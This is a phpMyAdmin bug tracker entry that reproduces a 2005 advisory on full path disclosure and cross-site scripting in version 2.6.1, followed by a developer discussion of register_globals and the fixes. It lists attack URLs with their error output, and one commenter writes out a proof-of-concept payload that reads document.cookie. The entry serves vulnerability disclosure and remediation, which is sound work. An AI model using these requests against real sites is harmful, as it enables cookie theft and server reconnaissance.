#1610 (in 2.6.1-pl1) Possible XSS Attacks
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[phpMyAdmin 2.6.1 Full Path Disclosure and XSS cXIb8O3.5]
Author: cXIb8O3
Date: 22.2.2005
- --- 0.Description ---
phpMyAdmin 2.6.1 is a tool written in PHP intended to
handle the administration of MySQL over the Web.
Currently it can create and drop databases,
create/drop/alter tables, delete/edit/add fields,
execute any SQL statement, manage keys on fields.
- --- 1. Full Path Disclosure ---
1.0
http://\[HOST]/[DIR]/libraries/sqlvalidator.lib.php?cfg[SQLValidator][use]=cXIb8O3
Error message :
- ---------------
Warning: main(./libraries/sqlvalidator.class.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/sqlvalidator.lib.php on
line 39
Fatal error: main() [function.require]: Failed opening
required './libraries/sqlvalidator.class.php'
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/sqlvalidator.lib.php on
line 39
1.1
http://\[HOST]/[DIR]/libraries/sqlparser.lib.php
Error message :
- ---------------
Warning: main(./libraries/string.lib.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/sqlparser.lib.php on
line 46
Fatal error: main() [function.require]: Failed opening
required './libraries/string.lib.php'
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/sqlparser.lib.php on
line 46
- ---------------
1.2
http://\[HOST]/[DIR]/libraries/select_theme.lib.php
Error message :
- ---------------
Warning: main(./libraries/grab_globals.lib.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/select_theme.lib.php on
line 34
Fatal error: main() [function.require]: Failed opening
required './libraries/grab_globals.lib.php'
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/select_theme.lib.php on
line 34
- ---------------
1.3
http://\[HOST]/[DIR]/libraries/select_lang.lib.php
Error message :
- ---------------
Warning: main(./libraries/grab_globals.lib.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/select_lang.lib.php on
line 14
Fatal error: main() [function.require]: Failed opening
required './libraries/grab_globals.lib.php'
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/select_lang.lib.php on
line 14
- ---------------
1.4
http://\[HOST]/[DIR]/libraries/relation_cleanup.lib.php
Error message :
- ---------------
Warning: main(./libraries/relation.lib.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/relation_cleanup.lib.php
on line 10
Fatal error: main() [function.require]: Failed opening
required './libraries/relation.lib.php'
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/relation_cleanup.lib.php
on line 10
- ---------------
1.5
http://\[HOST]/[DIR]/libraries/header_meta_style.inc.php
Error message :
- ---------------
Fatal error: Call to undefined function
PMA_setFontSizes() in
/www/phpMyAdmin-2.6.1/libraries/header_meta_style.inc.php
on line 9
- ---------------
1.6
http://\[HOST]/[DIR]/libraries/get_foreign.lib.php?foreigners=cXIb8O3&field=hi&foreigners[hi]=unloved
Error message :
- ---------------
Fatal error: Call to undefined function
PMA_countRecords() in
/www/phpMyAdmin-2.6.1/libraries/get_foreign.lib.php on
line 28
- ---------------
1.7
http://\[HOST]/[DIR]/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi
Error message :
- ---------------
Fatal error: Call to undefined function
PMA_linkOrButton() in
/www/phpMyAdmin-2.6.1/libraries/display_tbl_links.lib.php
on line 28
- ---------------
1.8
http://\[HOST]/[DIR]/libraries/display_export.lib.php
Error message :
- ---------------
Warning: main(./libraries/relation.lib.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/display_export.lib.php
on line 6
Fatal error: main() [function.require]: Failed opening
required './libraries/relation.lib.php'
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/display_export.lib.php
on line 6
- ---------------
1.9
http://\[HOST]/[DIR]/libraries/db_table_exists.lib.php
Error message :
- ---------------
Fatal error: Call to undefined function
PMA_sendHeaderLocation() in
/www/phpMyAdmin-2.6.1/libraries/db_table_exists.lib.php
on line 16
- ---------------
1.10
http://\[HOST]/[DIR]/libraries/charset_conversion.lib.php?cfg[AllowAnywhereRecoding]=smutno&allow_recoding=mi
Error message :
- ---------------
Fatal error: Call to undefined function PMA_dl() in
/www/phpMyAdmin-2.6.1/libraries/charset_conversion.lib.php
on line 42
- ---------------
1.11
http://\[HOST]/[DIR]/libraries/fpdf/ufpdf.php
Error message :
- ---------------
Warning: main(./libraries/fpdf/fpdf.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/fpdf/ufpdf.php on line 18
Warning: main() [function.include]: Failed opening
'./libraries/fpdf/fpdf.php' for inclusion
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/fpdf/ufpdf.php on line 18
Fatal error: Class 'FPDF' not found in
/www/phpMyAdmin-2.6.1/libraries/fpdf/ufpdf.php on line 20
- ---------------
1.12
http://\[HOST]/[DIR]/libraries/dbi/mysqli.dbi.lib.php
Error message :
- ---------------
Fatal error: Call to undefined function PMA_dl() in
/www/phpMyAdmin-2.6.1/libraries/dbi/mysqli.dbi.lib.php
on line 13
- ---------------
1.13
http://\[HOST]/[DIR]/libraries/dbg/setup.php?GLOBALS[cfg][DBG][enable]=cXIb
Error message :
- ---------------
Fatal error: Call to undefined function PMA_dl() in
/www/phpMyAdmin-2.6.1/libraries/dbg/setup.php on line 10
- ---------------
1.14
http://\[HOST]/[DIR]/libraries/auth/cookie.auth.lib.php?coming_from_common=cXIb8O3
Error message :
- ---------------
Fatal error: Call to undefined function
PMA_setFontSizes() in
/www/phpMyAdmin-2.6.1/libraries/auth/cookie.auth.lib.php
on line 17
- ---------------
- --- 2. XSS aka Cross Site Scripting ---
2.0
http://\[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&show_server_left=MyToMy&strServer=[XSS%20code]
http://\[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&cfg[BgcolorOne]=777777%22%3E%3CH1%3E[XSS%20code]
http://\[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&strServerChoice=%3CH1%3EXSS
2.1
http://\[HOST]/[DIR]/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&bgcolor=%22%3E[XSS%20code]
http://\[HOST]/[DIR]/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&row_no=%22%3E[XSS%20code]
2.2
http://\[HOST]/[DIR]/themes/original/css/theme_left.css.php?num_dbs=0&left_font_family=[XSS]
and more in this file.
2.3
http://\[HOST]/[DIR]/themes/original/css/theme_right.css.php?right_font_family=[XSS]
and more in this file.
- --- 3. How to fix ---
Download the new version of the script or update.
- --- 4. Greets ---
sp3x and ladyBMS
- --- 5.Contact ---
Author: Maksymilian Arciemowicz
Location: Poland(Jelenia Gora), Luxembourg(Bereldange)
Email: max [at] jestsuper [dot] pl
GPG-KEY: http://security.jestsuper.pl
http://securityreason.com/ Team
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (FreeBSD)
iD8DBQFCG5UVznmvyJCR4zQRAjWPAJ426XMVICiyHa8uWL0bkuTaXbeMNACdFRzq
BrQu2PRFI/Myhw5gg8rGW9s=
=miO8
-----END PGP SIGNATURE-----
i am waiting for a paches...
Discussion
Logged In: YES
user_id=418833
Maksymilian,
thank you for your report.
First of all, please do not submit two different issues with
one bug report.
The first issue (path disclosure) was already reported to us
and we are currently dealing with it. Please note, that you
can only exploit it if the php setting "display_errors" is
set to 1. The php manual advices to disable this feature on
productional systems.
http://de2.php.net/manual/en/ref.errorfunc.php#ini.display-errors
Thank you,
Alexander M. Turek
Logged In: YES
user_id=1225357
Ok.. so path disclosure is non critical etc..
but XSS..
Logged In: YES
user_id=418833
OK, let's do this. :-)
2.0: With grab_globals.lib.php, rev. 2.8 (attached to bug
#1149381), I cannot reproduce these exploits anymore.
2.1, 2.2 and 2.3: These exploits require "register_globals"
to be enabled in php.ini. This setting is considered to be
very dangerous and therefor disabled by default since php 4.2.0.
http://de3.php.net/register_globals
Maksymilian, is there any XSS attack you can see with my
latest patch and register_globals = Off? If not, I'd like to
mark this bug as fixed, too.
Logged In: YES
user_id=192186
Ad 2.1: I suggest making content of that file function and
call it with all neded params instead of including.
Ad 2.2 and 2.3: I can't find anything dangerous in modifying
CSS.
Logged In: YES
user_id=418833
Michal, when the script is called directly, the headers that
declare the code to be CSS are not sent. The browser would
expect HTML code, so you could inject harmful JS code here.
Were you able to reproduce the exploits?
Logged In: YES
user_id=192186
Maksymilian: When you sign messages using pgp, you should
publish public key on keyserver, otherwise it doesn't make
much sense.
rabus: I can reproduce it only with register_globals on. But
its really hard to make there valid javascript when
magic_quotes_gpc is enabled (what is default).
Logged In: YES
user_id=210714
Alexander,
for 2.0, I am able to reproduce, with PMA 2.6.1, using
/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&show_server_left=MyToMy&strServer=%3Cscript%3Ealert(document.cookie)%3C/script%3E
It happens also with current cvs HEAD (grab_globals.lib.php 2.8)
Logged In: YES
user_id=192186
Marc: you have register_globals on ;-)
Logged In: YES
user_id=418833
Michal is right. With register_globals set to off, the
should not be possible anymore:
http://rabus.phpmyadmin.net/demos/CVS_LATEST/libraries/select_server.lib.php?cfg\[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&show_server_left=MyToMy&strServer=%3Cscript%3Ealert(document.cookie)%3C/script%3E
If register_globals is on, it is almost impossible to avoid
such problems.
Logged In: YES
user_id=210714
Yes I have register_globals set to On; you see, here many
scripts are running, which depend on this setting .... And
I'm probably not the only one.
We have PMA_sanitize() which can take care of this. However,
I should put it into another include and call it from the
top of each script: much work in perspective.
Logged In: YES
user_id=418833
Marc,
this is mainly why it is possible to trigger this setting on
a per-directory basis. Enabling register_globals in php.ini
is dangerous and getting phpMyAdmin to detect harmful
variable injections is not that trivial right now.
Logged In: YES
user_id=1225357
ok so..
if register_globals=Off css`s non exist but if
register_globals=On can i make xss attack.
For example
If i have www in server X where register_globals=On and
phpmyadmin in my www, i nothing can do it. Better remove
this xss from phpmyadmin. ;]
Logged In: YES
user_id=418833
Sure you can, at least if you are using the Apache Webserver:
echo "php_flag register_globals off" >>
/path/to/phpMyAdmin/.htaccess
If not, there is probably a way to change php settings on a
per-directory basis in other webservers too.
Working around register_globals injections is almost
impossible for a project of our size. We will try to fix
this as far as possible with upcoming releases, but we can
never guarantee that you are fully protected against such
exploits. Securing php against them is mainly your task, not
ours. Sorry. :-/
Logged In: YES
user_id=1225357
Ok... [:
Logged In: YES
user_id=1225357
Ok... [: